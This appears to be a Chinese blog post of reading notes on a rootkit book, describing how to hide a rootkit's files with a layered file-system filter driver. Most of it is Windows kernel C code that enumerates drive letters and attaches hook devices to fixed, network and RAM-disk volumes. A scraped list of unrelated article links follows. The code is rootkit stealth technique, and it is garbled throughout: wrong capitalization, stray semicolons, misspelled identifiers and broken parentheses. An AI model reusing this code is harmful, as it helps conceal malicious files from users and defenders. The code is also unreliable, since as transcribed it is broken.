wodamazi
wodamazi

读书笔记_Rootkit技术_文件过滤驱动程序(1)

分层驱动程序可应用于文件系统。出于潜行的需求,文件系统对于rootkit有着特殊的吸引力。许多rootkit需要在文件系统中存储文件,并且这些文件必须是隐藏的。可以使用钩子技术来隐藏文件,但这种方法容易被检测出来。另外,如果文件或目录安装在SMB共享系统上,那么钩住系统服务描述表(system service descriptor table,SSDT)并不能隐藏它们。下面来看通过分层驱动的方法来隐藏文件。

首先从驱动的入口函数DriverEntry例程来看:

NTSTATUSDriverEntry ( IN PDRIVER_OBJECT DriverObject,

IN PUNICODE_STRINGRegistryPath)

{

For ( i = 0; I <=IRP_MJ_MAXIMUM_FUNCTION; i++)

{

DriverObject->MajorFunctionp[i] =OurDispatch;

}

DriverObject->FastIoDispatch=&OurFastIOHook;

在DriverEntry例程中,是MajorFunction数组指向OurDispatch调度例程,还建立了一个FastIoDispatch调度表,这里可以看到文件系统驱动程序特有的一些内容。FastIo是文件系统程序的另一种通信方法。

准备好调度表后,下面必须钩住驱动器,调用HookDriveSet函数在所有可用得驱动器盘符上安装钩子:

DWORD d_hDrives= 0;

// Initializethe drives we will hool

For(I = 0;i< 26; i++)

DriveHookDevices[i] =NULL;

DriveToHook =0;

ntStatus =GetDrivesToHook(&d_hDrives);

if(!NT_SUCCESS(ntStatus))

return ntStatus;

HookDriveSet(d_hDrives,DriverObject);

以下代码用于获取钩住的驱动程序列表:

NTSTATUSGetDrivesToHook(DWORD *d_hookDrives)

{

NTSTATUS ntstatus;

PROCESS_DEVICEMAP_INFORMATION s_devMap;

DWORD MaxDriveSet, CurDriveSet;

Int drive;

If(d_hookDrives == NULL)

Return STATUS_UNSUCCESSFUL;

注意当前进程的句柄用法:

Ntstatus = ZwQueryInformationProcess(( HANDLE) 0xffffffff,

ProcessDeviceMap,

&s_devMap,

Sizeof(s_devMap),

NULL);

If(!NT_SUCCESS(ntstatus))

Return ntstatus;

// Get available drives we can monitor.

MaxDriveSet = s_devMap.Query.DriveMap;

CurDriveSet = MaxDriveSet;

For ( drive = 0; drive < 32; ++drive)

{

If(MaxDriveSet &(1<<drive))

{

Switch(s_devMap.Query.DriveType[drive])

{

首先处理要跳过的驱动器:

// We don’t like these: remove them.

Case DRIVE_UNKNOWN: // Thedrive type cannot be determined.

Case DRIVE_NO_ROOT_DIR; //The root directory does not exit.

curDriveSet &=~(1 <<drive);

break;

// The drive can be removed from the drive

// Doesn’t make sense to put hidden files on

// a removable drive because we will not

// necessarily control the computer that the

// drive is mounted on next.

Case DRIVE_REMOVABLE:

CurDriveSet &= ~(1<< drive);

Break;

// The drive is a CD-ROM drive

Case DRIVE_CDROM;

CurDriveSet &= ~(1<< drive);

Break;

将要钩住以下驱动器:DRIVE_FIXED,DRIVE_REMOTE和DRIVE_RAMDISK.

代码继续如下:

}

}

}

*d_hookDrives = CurDriveSet;

Return ntstatus;

}

钩住驱动器集合的代码如下:

ULONG HookDriveSet(IN ULONG DriveSet, IN PDRIVER_OBJECT DriverObject)

{

PHOOK_EXTENSION hookExt;

ULONG drive, I;

ULONG bit;

// Scan the drive table,looking for hits on the DriveSet bitmask.

For( drive = 0; drive <26; ++drive_

{

Bit = 1<< drive;

// Are we supposed to hookthis drive

If (( bit & DriveSet)&&!(bit &DrivesToHook))

{

If( !HookDrive( drive,DriverObject))

{

// remove from drive setif can’t be hooked

DriveSet &= ~bit;

}

Else

{

// Hook drives in samedrive group

For( I = 0; I < 26; i++)

{

If( DriveHookDevices[i] ==DriveHookDevices[ drive])

{

DriveSet |= (1<<i);

}

}

}

}

Else if ( !(bit & DriveSet)&&(bit & DrivesToHook) )

{

// Unhook this drive and all in the group

For ( I = 0; i<26; i++)

{

If( DriveHookDevices[i] ==DriveHookDevices[ drive])

{

UnhookDrive(i);

DriveSet &= ~(1<<i);

}

}

}

}

// return set of drives currently hooked.

DrivesToHook = DriveSet;

Return DriveSet;

}

对于单个驱动器挂上你和取下钩子的代码如下:
if(DriveHookDevices[Drive])

{

hookExt =DriveHookDevices[Drive]->DeviceExtension;

hookExt -> Hooked =FALSE;

}

}

BOOLEAN HookDrive ( IN ULONG Drive, IN PDRIVER_OBJECT DriverObject)

{

IO_STATUS_BLOCK ioStatus;

HANDLE ntFileHandle;

OBJECT_ATTRIBUTESobjectAttributes;

PDEVICE_OBJECTfileSysDevice;

PDEVICE_OBJECT hookDevice;

UNICODE_STRINGfileNameUnicodeString;

PFILE_FS_ATTRIBUTE_INFORMATIONfileFsAttributes;

ULONG fileFsAttributesSize;

WCHAR filename[] = L”\\DosDevices\\A:\\”;

NTSTATUS ntStatus;

ULONG I;

PFILE_OBJECT fileObject;

PHOOK_EXTENSIONhookExtension;

If(Drive >= 26)

Return FALSE; //Illegal drive letter

// Test whether we havehooked this drive

If ( DriveHookDevices [Drive] == NULL )

{

Filename[12] = (CHAR) ( ‘A’+ Drive); // Set up drive name

下面打开磁盘卷的根目录:

RtlInitUnicodeString(&fileNameUnicodeString, filename);

InitializeObjectAttributes(&objectAttributes,

&fileNameUnicodeString, OBJ_CASE_INSENSITIVE, NULL, NULL);

ntStatus = ZwCreateFile(&ntFileHandle,

SYNCHRONIZE | FILE_ANY_ACCESS,

&objectAttributes,

&ioStatus,

NULL,

0,

FILE_SHARE_READ |FILE_SHARE_WRITE,

FILE_OPEN,

FILE_SYNCHRONOUS_IO_NONALERT | FILE_DIRECTORY_FILE,

NULL,

0);

If ( ! NT_SUCCESS ( ntStatus ))

{

若程序无法打开驱动器,则返回“false”:

Return FALSE;

}

// Use file handle to look up the fileobject.

// If this is successful,

// we must eventually decrement the fileobject

ntStatus = ObReferenceObjectByHandle (ntFileHandle,

FILE_READ_DATA,

NULL,

KernelMode,

&fileobject,

NULL);

If( !NT_SUCCESS ( ntStatus))

{

若程序无法从句柄中获得文件对象,则返回“false”:

ZwClose ( ntFileHandle );

Return FALSE;

}

// Get the device object from the Fileobject

fileSysDevice = IoGetRelatedDeviceObject (fileObject );

if(!fileSysDevice)

{

若程序无法获取设备对象,则返回“flase”:

ObDereferenceObject(fileObject);

ZwClose (ntFileHandle);

Return FALSE;

}

// Check the device list to see if we arealready

// attached to this particular device

// This can happen when more than one driveletter

// is being handled by the same network

// redirector

For (I = 0; i<26; i++)

{

If( DriveHookDevices[i] == fileSysDevice )

{

// if we are already watching it

// associate this drive letter

// with the others that are handled

// by the same network driver. This enables us to intelligentlyupdate

// the hooking menus when the user specifies that one of the groupshould not be

// watched – we mark all of the related drives as unwantched aswell.

ObDereferenceObject(fileObject);

ZwClose(ntFileHandle);

DriveHookDevice[Drive] =fileSysDevice;

Return TRUE;

}

}

// The file system’s device hasn’t been hooked already, so make ahooking device object // that will be attached to it

ntStatus = IoCreateDevice(DriverObject,

sizeof(HOOK_EXTENSION),

NULL,

fileSysDevice->DeviceType.

fileSysDevice->Characteristics,

FALSE,

&hookDevice);

If( !NT_SUCCESS(ntStatus))

{

若程序无法创建相关的设备,则返回“false”:

ObDereferenceObject(fileObject);

ZwClose(ntFileHandle);

Return FALSE;

}

// Clear he device’s init flag

// If we do not clear this flag, it is speculated no one else wouldbe able to layer on top

// of us. This may be a useful feature in the future !

hookDevice->Flags &=~DO_DEVICE_INITIALIZEING;

hookDevice->Flags|=(fileSysDevice->Flags&(DO_BUFFERED_IO | DO_DIRECT_TO));

// Set up the device extensions. The drive letter and file system objectare stored in the

// extenson

hookExtension = hookDevice->DeviceExtension;

hookExtension->LogicalDrive = ‘A’ + Drive;

hookExtension->FileSystem = fileSysDevice;

hookExtension->Hooked = TRUE;

hookExtension->Type = STANDARD;

// Finally, attach to the device. As soon as we are successfullyattached, we may start

// receiving IRPs targeted at the device we are hooked.

ntStatus = IoAttachDeviceByPointer( hookDevice, fileSysDevice);

if( !NT_SUCCESS(ntStatus))

{

ObDereferenceObject (fileObject);

ZwClose(ntFileHandle);

Return FALSE;

}

// Determine whether this is an NTFS drive

fileFsAttributesSize = sizeof(FILE_FS_ATTRIBUTE_INFORMATION) +MAXPATHLEN;

hookExtension->FsAttributes = (PFILE_FS_ATTRIBUTE_INFORMATION)

ExAllocatePool(NonPagedPool, fileFsAttributesSize);

If(hookExtension->FsAttributes && !NT_SUCCESS (

IoQueryVolumeInformation ( fileObject, FileFsAttributeInformation,fileFSAttributesSize,

hookExtension->FsAttributes,

&fileFsAttributesSize)))

{

// On failure, we just don’thave attributes for this file system.

ExFreePool (hookExtesnion->FsAttributes_;

hookExtension->FsAttributes = NULL;

}

// Close the file and update the hooked drive list by entering apointer to the hook

// device object in it.

ObDereferenceObject ( fileObject);

ZwClose(ntFileHandle);

DriveHookDevices[Drive] = hookDevice;

}

Else // This drive is already hooked

{

hookExtension =DriveHookDevices[Drive]->DeviceExtension;

hookExtension ->Hooked =TRUE;

}

Return TRUE;

}

;

你可能感兴趣的:(读书笔记)

  • 10月|愿你的青春不负梦想-读书笔记-01 Tracy的小书斋
    本书的作者是俞敏洪,大家都很熟悉他了吧。俞敏洪老师是我行业的领头羊吧,也是我事业上的偶像。本日摘录他书中第一章中的金句:『一个人如果什么目标都没有,就会浑浑噩噩,感觉生命中缺少能量。能给我们能量的,是对未来的期待。第一件事,我始终为了进步而努力。与其追寻全世界的骏马,不如种植丰美的草原,到时骏马自然会来。第二件事,我始终有阶段性的目标。什么东西能给我能量?答案是对未来的期待。』读到这里的时候,我便
  • 《投行人生》读书笔记 小蘑菇的树洞
    《投行人生》----作者詹姆斯-A-朗德摩根斯坦利副主席40年的职业洞见-很短小精悍的篇幅,比较适合初入职场的新人。第一部分成功的职业生涯需要规划1.情商归为适应能力分享与协作同理心适应能力,更多的是自我意识,你有能力识别自己的情并分辨这些情绪如何影响你的思想和行为。2.对于初入职场的人的建议,细节,截止日期和数据很重要截止日期,一种有效的方法是请老板为你所有的任务进行优先级排序。和老板喝咖啡的好
  • 拥有断舍离的心态,过精简生活--《断舍离》读书笔记 爱吃丸子的小樱桃
    不知不觉间房间里的东西越来越多,虽然摆放整齐,但也时常会觉得空间逼仄,令人心生烦闷。抱着断舍离的态度,我开始阅读《断舍离》这本书,希望从书中能找到一些有效的方法,帮助我实现空间、物品上的断舍离。《断舍离》是日本作家山下英子通过自己的经历、思考和实践总结而成的,整体内涵也从刚开始的私人生活哲学的“断舍离”升华成了“人生实践哲学”,接着又成为每个人都能实行的“改变人生的断舍离”,从“哲学”逐渐升华成“
  • 读书笔记|《遇见孩子,遇见更好的自己》5 抹茶社长
    为人父母意味着放弃自己的过去,不要对以往没有实现的心愿耿耿于怀,只有这样,孩子们才能做回自己。985909803.jpg孩子在与父母保持亲密的同时更需要独立,唯有这样,孩子才会成为孩子,父母才会成其为父母。有耐心的人生往往更幸福,给孩子留点余地。认识到养儿育女是对耐心的考验。为失败做好心理准备,教会孩子控制情绪。了解自己的底线,说到底线,有一点很重要,父母之所以发脾气,真正的原因往往在于他们自己,
  • 阅读《认知觉醒》读书笔记 就看看书
    本周阅读了周岭的《认知觉醒开启自我改变的原动力》,启发较多,故做读书笔记一则,留待学习。全书共八章,讲述了大脑、潜意识、元认知、专注力、学习力、行动力、情绪力及成本最低的成长之道。具体描述了大脑、焦虑、耐心、模糊、感性、元认知、自控力、专注力、情绪专注、学习专注、匹配、深度、关联、体系、打卡、反馈、休息、清晰、傻瓜、行动、心智宽带、单一视角、游戏心态、早起、冥想、阅读、写作、运动等相关知识点。大脑
  • 《对生命说是》读书笔记2021-5-27 Diana_58d9
    静心技巧——换个视角看待问题。尝试一下这个实验,1坐在椅子上,允许自己全身心的沉浸在你最爱的问题当中,你知道头脑热爱咀嚼他们,记录当你被卷入问题时的感受。2站起来有意识地离开那张椅子,想象你现在离开了你的问题。缓缓的围绕椅子走一圈,从不同的角度看看你的问题。在房间中找一个远离问题的空间,开始仔细深入的看看这个问题,他是真实的还是你制造出来的,同样的状况对于其他人来说会是问题吗?3反复体会作战问题里
  • 精力是碎片化时代的核心竞争力——精力管理介绍 爱写作的harry
    《掌控:开启不疲惫、不焦虑的人生》读书笔记精力是碎片化时代的核心竞争力精力包括身、心两个层面,包括体力、专注力和意志力等多个维度。在信息爆炸、全球化竞争的时代,谁的体力充沛,专注力和意志力更强,谁获胜的机会就更大。而要做到这些,不做精力管理,一切都是空谈。另外,人的精力是有限的,表现会有高低起伏,所以需要管理,需要规划使用。怎样才算做到了精力管理精力管理是指主动掌握自己的体力、专注力和意志力,让自
  • 《经营者养成记》读书笔记分享 37度杉杉
    何为经营者:变革的能力、赚钱的能力、建设团队的能力和追求理想的能力。读书笔记:(一)经营的含义1、所谓经营者,就是取得成果的人2、所谓经营者,是抱持使命感,将使命与成果相结合的人3、经营者必须是领导者,具备“建设团队的能力”4、经营者必须为使命而生的人,具备“追求理想的能力”(二)为什么必须培养经营者?一、变革的能力1、抱持高远的目标2、质疑常识,不受常识束缚3、树立高标准、不放松不放弃4、不畏风
  • 财富自由之路读书笔记2 Elaine_a963
    继续财富自由读书笔记,今天就第十-二十三章进行归纳总结思考。这本书可以说是边学边练的武功秘籍。秘籍一:注意力。先从认知上刷新,先前谈到价值的重要性及单位价值提升的必要性。这里就引出了:“注意力”是在任何地方“挖掘”价值的最基本工具。那么,要自如运用注意力,就得练习。这里李老师给的无他,就是基本功训练扎实-坐享。秘籍二:活在未来。再一次颠覆认知,大众的思维是活在当下,而这里指引我们要活在未来。用正确
  • 【机器人建模和控制】读书笔记 Piccab0o 机器人
    机器人建模和控制——马克·斯庞A.x10=x1∙x0x^0_1=x_1\bulletx_0x10=x1∙x0,其实就是:1)x1x_1x1轴向量在O0O_0O0系下的坐标2)在x0x_0x0轴上的投影3)坐标变换矩阵的R10R_1^0R10的第一个元素B.点p在o1x1y1z1o_1x_1y_1z_1o1x1y1z1系下的坐标p1p^1p1可以表示为:p=ux1+vy1+wz1p=ux_1+vy_
  • 读书笔记 语馨_f389
    王聪丽坚持分享第1008天《亲密关系》期望就是通往地狱之路,因为期望会把接受和让人自由等充满爱意的感觉挡在门外。如果我不能接受别人现在的样子或不让他们自由地走自己的路,那么我就不是真的爱他们,我只是想从他们身上得到满足,与他们建立亲密关系的目的并不是为了爱,而是为了满足我小小的自私需求。我们可以觉察一下,在潜意识里,我对他有什么要求。让人惊讶的是,不开心的原因往往是沉睡多年的需求。不论是用暗示还是
  • 《掌控习惯》第二遍读书笔记 尼古拉斯咚
    这本书反反复复看了两遍,每一遍对书中的内容都有不同的认识;以下是我的读书笔记和行动感悟读书的笔记和感悟好习惯+复利的力量是巨大的,这个可能是老生常谈的话题,但当我真正意识到,并重新开始审视自己日常生活中的习惯时才发现,坏习惯让我自己每天有不少时间浪费在了平庸上,随着时间的消逝我损失的也越来越多;生活中经常说“做时间的朋友”,“延迟满足”之类的话,但这些都有一个前提条件是只有当你真正是养成了好的习惯
  • 【0220读书笔记】面对压力怎么办 正本
    人生每一天都是现场直播,所谓的人前显赫,不过是以往的极致积累付出所换来的。今天看到江南春谈到他过往的创业史,也并不是一帆风顺,顺风顺雨的。恰恰相反,在他创业的道路上,每一步都是如履薄冰,都是受宠若惊,竞争对手也会层出不穷,虎视眈眈向其发起挑战。001.量力而行与全力以赴在创业初期,我们的态度就应当是敢想敢做,全力以赴,因为不拼就不会有机会。当我们进入经营时期时,就要综合评判,尽自己所能去行事,万不
  • 2022-08-3读书笔记 静待花开20
    ❤️据报道,有些人在面对及其重要甚至关系到自身前途和命运的大事要做出决定时,往往不是挖空心思、深思熟虑,而是根据自己的内心感觉做出抉择。❤️据研究,人从看到一个物体到对它做出反应,全过程仅有0.07秒的时间。在这个过程中,仅是神经和主观意识参与了吗?不是。潜意识也是参与其中的。故曰:“所以任物者心。”❤️研究发现,人们在学习一种知识、机能后,如能美美睡上一觉,则会对所学知识、机能的消化、掌握很有裨
  • 重读《新生-七年就是一辈子》- 26 不能容错的系统肯定是脆弱的 greenorchid
    读后感想:我觉得自己的容错能力在学生,同事、朋友方面都还好,毕竟我很少和他们交流。但是,我对家人有时做的不好,容错能力反而较差,因此,有时会影响心情、注意力等。看了这篇文章,我能做到平心静气,不乱发脾气吗?我觉得有时能做到,很多时候可能还是做不到。读书笔记:今天的计算机科学里(包括它的“邻居”工程学里),都有一个重要的概念:容错(Faulttolerance)如果一个系统不能容错,那么它就是脆弱的
  • 《野草》复仇(其一) 读书笔记 女人知书香
    “复仇”是鲁迅从早年到晚年,念兹在兹,一以贯之的恶一个思绪。几十年间在他心头萦绕不去,回环往复,多次谈及,成为作品和思想的重要主题之一。人的皮肤之厚,大概不到半分,鲜红的热血,就循着那后面,在比密密层层地爬在墙壁上的槐蚕更其密的血管里奔流,散出温热。于是各以这温热互相蛊惑,煽动,牵引,拼命希求偎倚,接吻,拥抱,以得生命的沉酣的大欢喜。【议论】如有人以丽人刺穿其皮肤,则有鲜血喷灌于杀戮者,这是动态的
  • 平平淡淡才是真——《菜根谭》读书笔记 云卷韵舒
    图片图片士君子之涉世,于人不可轻为喜怒,喜怒轻,则心腹肝胆皆为人所窥。于物不可重为爱憎。爱憎重,则意气精神悉为物所制。士大夫君子在世上,对人不能轻易流露自己的喜怒哀乐,否则,所有的心思都会被人看破;对世上万物,也不要过分喜欢或厌恶,否则,就会玩物丧志。心体澄澈,常在明镜止水之中,则天下自无可厌之事;意气和平,常在丽日光风之内,则天下自无可恶之人。如果心如明镜,世上就没有心烦之事;心态平和,世上就没
  • 读《野草》有感 雨后晴天的女孩
    这段时间有点懒,看过的书都没有做读书笔记,也就没有写读后感。但今晚看鲁迅的散文诗集《野草》时,却做了很多的笔记(主要是抄好词好句),突然就有了一种想写的冲动,虽然不知道要写点什么,但是随便写写也好。鲁迅的题辞中说到:野草,根本不深,花叶不美,却有一股顽强的生命力,任何人都阻挡不了它的生长。是啊,《野草》这本书虽不厚,却可以让人联想到一大堆的东西。阅读完之后,我想找几个词来形容一下,却怎么也想不到,
  • 2023-04-20 祝澜
    祝澜1940天2023-4-20读书笔记:当家庭作业的责任明确地由孩子来承担时,才会有真正的学习。期待孩子们承担责任,而不是期待他们的父母比着他们承担责任,会造就有能力的年轻人。这并不是说父母们和老师不能帮助孩子们在家庭作业上取的成功。当着眼于帮助那些自我帮助的孩子时,每个人就都会赢。
  • 读书笔记 语馨_f389
    王聪丽坚持分享第688天《非暴力沟通》真正高情商的人,会认为,发脾气是一种很好的沟通方式。我以前说过,所谓情商高,就是心中有他人;所谓情商高,不是虚伪,而是温暖。但这不是说,我们心中要没有自己,真正的情商高,是把自己当朋友,与自己和解,对自己也要温暖啊。为了幸福,必须把“别人怎么看我”这个问题放在一边。不带评论的观察是人类智慧的最高境界。学会说出自己的感受,而不是让别人猜。社会的节奏很快,人们都在
  • 《Android进阶之光》读书笔记 soleil雪寂 读书笔记#Android进阶之光
    文章目录第1章Android新特性1.1.Android5.0新特性1.2.RecyclerView1.1.4.3种Notification1.1.5.Toolbar与Palette1.1.6.Palette1.2.Android6.0新特性1.2.2.运行时权限机制1.3.Android7.0新特性第2章MaterialDesign2.2.DesignSupportLibrary常用控件详解第3
  • 《人生海海》读书笔记 墨染馨香
    天地英雄客,人间寸草心。“人生海海,潮落之后是潮起,你说那是消磨、笑柄、罪过,但那就是我的英雄主义。”各位读书的时候,有没有那么一句话,突然击中了你,让你的内心秩序瞬间变得兵荒马乱、溃不成军?书确是一部好书,只是读到最后全是眼泪。人间的美与丑、人性善与恶、人生痛与泪不停地交织纠缠,心绪随着情节跌宕起伏,却又夹杂着抑制不住的伤感,久久无法平静。“上校”传奇的一生,“爷爷”无奈的一生,“父亲”沉默的一
  • 决胜b端 | 读书笔记01-03章 一白学习录
    C端与B端产品的区别:B端产品经理应具备的能力:1、逻辑思维与抽象能力:基于对业务的透彻理解,把现实世界的复杂场景抽象成结构性的系统和模块,将现实世界的抽象运转机制提炼成规律。2、技术知识储备3、复杂项目管理能力4、业务与经营管理知识B端产品经理的职业发展方向:1、产品设计:B端产品经理可以从某一个细分的产品方向做起,逐步延伸到一条或多条业务线的设计。在一个方向打牢根基,同时关注新的动态,抓住机遇
  • 《买书记历》读书笔记 歪嘴文说
    《买书记历》本书以作者及他身边爱书人,准确说是“爱淘书”的人,来记叙他们当年的“淘书”经历。淘旧书,缺本,古书,罕书,有价值的。类似淘古董,转手可出高价或自我珍藏。因书过厚,后部多为跳看。对其中一段记事细看了,知道还有这么一种事。一个人打作者电话说有一批书来看一下,具体数量不好说有60吨吧,作者去看后爬书堆上,看有没有珍品,结果都是杂志。问价,要5千一顿,作者当即要走,说这书卖废品也不值1千1一吨
  • 精诚所至,金石为开 - 草稿 一禾粒子
    今天阅读的章节是:精益求精几天来,虽说是在分享读书笔记,实则还是在继续梳理自己。每天的学习内容,读起来,对自己都有不小的触动。我时常在感叹猫叔的剽悍!为了让我们少走弯路,把自己一路走来的足迹,展示给我们;猫叔通过大量的阅读和践行,获得了成功,又将最精华的环节推荐给我们,他选定的读本,都是针对我们前行路上会遇到的迷茫,由于他的督导,成就了后来人,使得行者事半功倍。在学习的路上,我们需要得到这些具有针
  • 《一年顶十年》读书笔记Day2/17 设绘喵爱读书April
    1-2状态如何成为一个更在状态的狠人?1.你想成为怎样的人如果你想成为强者,你现在就可以向强者靠近,并以强者的标准来要求自己,像强者一样活着。2.你应该远离哪些人总是打击你的人;见不得别人好的人;不思进取混日子的人;过度消耗你的人。3.我会常备哪些法宝读能带来力量的书;励志的电影;能带来力量的音乐;4.墙上挂字有什么用目所能及。稻盛和夫六项精进:付出不亚于任何人的努力;要谦虚,不要骄傲;要每天反省
  • 读书笔记《焦虑自救手册》 如雪般飞舞
    各位好,今天我们讲一本非常实用的小书,叫作《焦虑自救手册》。昨天我见到一个朋友,他就有焦虑症。他说你们不是讲过两本关于焦虑症的书了吗,而且讲得都很好,为什么还要再讲一本?我说因为大部分读者的焦虑症还没有缓解,只要有读者的焦虑症还没有缓解,我们其实就应该继续地探索这方面的话题。为什么呢?因为这本书的作者告诉我们,对于焦虑的治疗来说,一个非常重要的原理就是不断地重复。就是我们要一而再、再而三的重复,直
  • 《把时间当朋友》读书笔记 小二王
    1、养成不怕麻烦的性格,才可能拥有耐心。耐心则是在任何工作、学习上获得成功的前提。2、你比别人强一点根本没用,真正有用的是你比别人强很多很多。3、要提高自己的社交质量,最好将时间和精力更多的倾注在"把自己变得更加优秀"这件事情上——哪怕只在某一方面。4、想办法提前预知自己需要掌握哪些技能,再确定它们是自己可以通过练习真正熟练掌握的技能,而后制定长期计划,一点一点稳步执行。5、如果我们一整天都在做那
  • 整本书阅读评价设计 zhangshoulan
    一、评价设计的理论背景(一)2022新课标关于课程评价的描述:“语文课程评价包括过程性评价和终结性评价。过程性评价贯串语文学习全过程,终结性评价包括学业水平考试和过程性评价的综合结果。”“应关注整本书阅读和跨学科学习的阶段性评价,采用读书笔记、读书报告会、读书分享会等方式引导学生高质量完成整本书的阅读;可通过观察报告、实验报告、研究报告等,评价学生跨学科学习的阶段性成果。”“第一学段的评价要特别重
  • 读书笔记|碎片化写作 听雨Jack
    在现代职场,总的趋势就是工作时间越来越碎片化,即使在没有微博微信的时代,我们的工作时间也早就被电话、邮件、QQ、会议打断成了碎片,而微博、微信这样的移动媒体只是加剧了这一趋势。这就需要我们利用碎片时间完成系统化工作。对于写作这件事,可以使用碎片化写作法:一份完整的文章=1分钟灵感+5分钟构思+5分钟提纲+5分钟素材+…+3分钟素材+半小时高效写作+5分钟排版+5分钟配图+1分钟推送+1分钟回复评论
  • 多线程编程之join()方法 周凡杨 javaJOIN多线程编程线程
    现实生活中,有些工作是需要团队中成员依次完成的,这就涉及到了一个顺序问题。现在有T1、T2、T3三个工人,如何保证T2在T1执行完后执行,T3在T2执行完后执行?问题分析:首先问题中有三个实体,T1、T2、T3, 因为是多线程编程,所以都要设计成线程类。关键是怎么保证线程能依次执行完呢?   Java实现过程如下: public class T1 implements Runnabl
  • java中switch的使用 bingyingao javaenumbreakcontinue
    java中的switch仅支持case条件仅支持int、enum两种类型。 用enum的时候,不能直接写下列形式。 switch (timeType) { case ProdtransTimeTypeEnum.DAILY: break; default: br
  • hive having count 不能去重 daizj hive去重having count计数
    hive在使用having count()是,不支持去重计数   hive (default)> select imei from t_test_phonenum where ds=20150701 group by imei having count(distinct phone_num)>1 limit 10;  FAILED: SemanticExcep
  • WebSphere对JSP的缓存 周凡杨 WAS JSP 缓存
          对于线网上的工程,更新JSP到WebSphere后,有时会出现修改的jsp没有起作用,特别是改变了某jsp的样式后,在页面中没看到效果,这主要就是由于websphere中缓存的缘故,这就要清除WebSphere中jsp缓存。要清除WebSphere中JSP的缓存,就要找到WAS安装后的根目录。        现服务
  • 设计模式总结 朱辉辉33 java设计模式
    1.工厂模式   1.1 工厂方法模式 (由一个工厂类管理构造方法)      1.1.1普通工厂模式(一个工厂类中只有一个方法)      1.1.2多工厂模式(一个工厂类中有多个方法)      1.1.3静态工厂模式(将工厂类中的方法变成静态方法) &n
  • 实例:供应商管理报表需求调研报告 老A不折腾 finereport报表系统报表软件信息化选型
    引言 随着企业集团的生产规模扩张,为支撑全球供应链管理,对于供应商的管理和采购过程的监控已经不局限于简单的交付以及价格的管理,目前采购及供应商管理各个环节的操作分别在不同的系统下进行,而各个数据源都独立存在,无法提供统一的数据支持;因此,为了实现对于数据分析以提供采购决策,建立报表体系成为必须。 业务目标 1、通过报表为采购决策提供数据分析与支撑 2、对供应商进行综合评估以及管理,合理管理和
  • mysql 林鹤霄
    转载源:http://blog.sina.com.cn/s/blog_4f925fc30100rx5l.html mysql -uroot -p ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)   [root@centos var]# service mysql
  • Linux下多线程堆栈查看工具(pstree、ps、pstack) aigo linux
    原文:http://blog.csdn.net/yfkiss/article/details/6729364   1. pstree pstree以树结构显示进程$ pstree -p work | grep adsshd(22669)---bash(22670)---ad_preprocess(4551)-+-{ad_preprocess}(4552)  &n
  • html input与textarea 值改变事件 alxw4616 JavaScript
    // 文本输入框(input) 文本域(textarea)值改变事件 // onpropertychange(IE) oninput(w3c) $('input,textarea').on('propertychange input', function(event) {      console.log($(this).val()) });  
  • String类的基本用法 百合不是茶 String
      字符串的用法;     // 根据字节数组创建字符串 byte[] by = { 'a', 'b', 'c', 'd' }; String newByteString = new String(by);         1,length()  获取字符串的长度     &nbs
  • JDK1.5 Semaphore实例 bijian1013 javathreadjava多线程Semaphore
    Semaphore类        一个计数信号量。从概念上讲,信号量维护了一个许可集合。如有必要,在许可可用前会阻塞每一个 acquire(),然后再获取该许可。每个 release() 添加一个许可,从而可能释放一个正在阻塞的获取者。但是,不使用实际的许可对象,Semaphore 只对可用许可的号码进行计数,并采取相应的行动。 S
  • 使用GZip来压缩传输量 bijian1013 javaGZip
            启动GZip压缩要用到一个开源的Filter:PJL Compressing Filter。这个Filter自1.5.0开始该工程开始构建于JDK5.0,因此在JDK1.4环境下只能使用1.4.6。         PJL Compressi
  • 【Java范型三】Java范型详解之范型类型通配符 bit1129 java
        定义如下一个简单的范型类,   package com.tom.lang.generics; public class Generics<T> { private T value; public Generics(T value) { this.value = value; } }
  • 【Hadoop十二】HDFS常用命令 bit1129 hadoop
    1. 修改日志文件查看器   hdfs oev -i edits_0000000000000000081-0000000000000000089 -o edits.xml cat edits.xml   修改日志文件转储为xml格式的edits.xml文件,其中每条RECORD就是一个操作事务日志   2. fsimage查看HDFS中的块信息等 &nb
  • 怎样区别nginx中rewrite时break和last ronin47
    在使用nginx配置rewrite中经常会遇到有的地方用last并不能工作,换成break就可以,其中的原理是对于根目录的理解有所区别,按我的测试结果大致是这样的。 location /    {         proxy_pass http://test; 
  • java-21.中兴面试题 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等于 m bylijinnan java
    import java.util.ArrayList; import java.util.List; import java.util.Stack; public class CombinationToSum { /* 第21 题 2010 年中兴面试题 编程求解: 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等
  • eclipse svn 帐号密码修改问题 开窍的石头 eclipseSVNsvn帐号密码修改
    问题描述:      Eclipse的SVN插件Subclipse做得很好,在svn操作方面提供了很强大丰富的功能。但到目前为止,该插件对svn用户的概念极为淡薄,不但不能方便地切换用户,而且一旦用户的帐号、密码保存之后,就无法再变更了。 解决思路:      删除subclipse记录的帐号、密码信息,重新输入
  • [电子商务]传统商务活动与互联网的结合 comsci 电子商务
          某一个传统名牌产品,过去销售的地点就在某些特定的地区和阶层,现在进入互联网之后,用户的数量群突然扩大了无数倍,但是,这种产品潜在的劣势也被放大了无数倍,这种销售利润与经营风险同步放大的效应,在最近几年将会频繁出现。。。。        如何避免销售量和利润率增加的
  • java 解析 properties-使用 Properties-可以指定配置文件路径 cuityang javaproperties
    #mq xdr.mq.url=tcp://192.168.100.15:61618; import java.io.IOException; import java.util.Properties; public class Test { String conf = "log4j.properties"; private static final
  • Java核心问题集锦 darrenzhu java基础核心难点
    注意,这里的参考文章基本来自Effective Java和jdk源码 1)ConcurrentModificationException 当你用for each遍历一个list时,如果你在循环主体代码中修改list中的元素,将会得到这个Exception,解决的办法是: 1)用listIterator, 它支持在遍历的过程中修改元素, 2)不用listIterator, new一个
  • 1分钟学会Markdown语法 dcj3sjt126com markdown
    markdown 简明语法 基本符号 *,-,+ 3个符号效果都一样,这3个符号被称为 Markdown符号 空白行表示另起一个段落 `是表示inline代码,tab是用来标记 代码段,分别对应html的code,pre标签 换行 单一段落( <p>) 用一个空白行 连续两个空格 会变成一个 <br> 连续3个符号,然后是空行
  • Gson使用二(GsonBuilder) eksliang jsongsonGsonBuilder
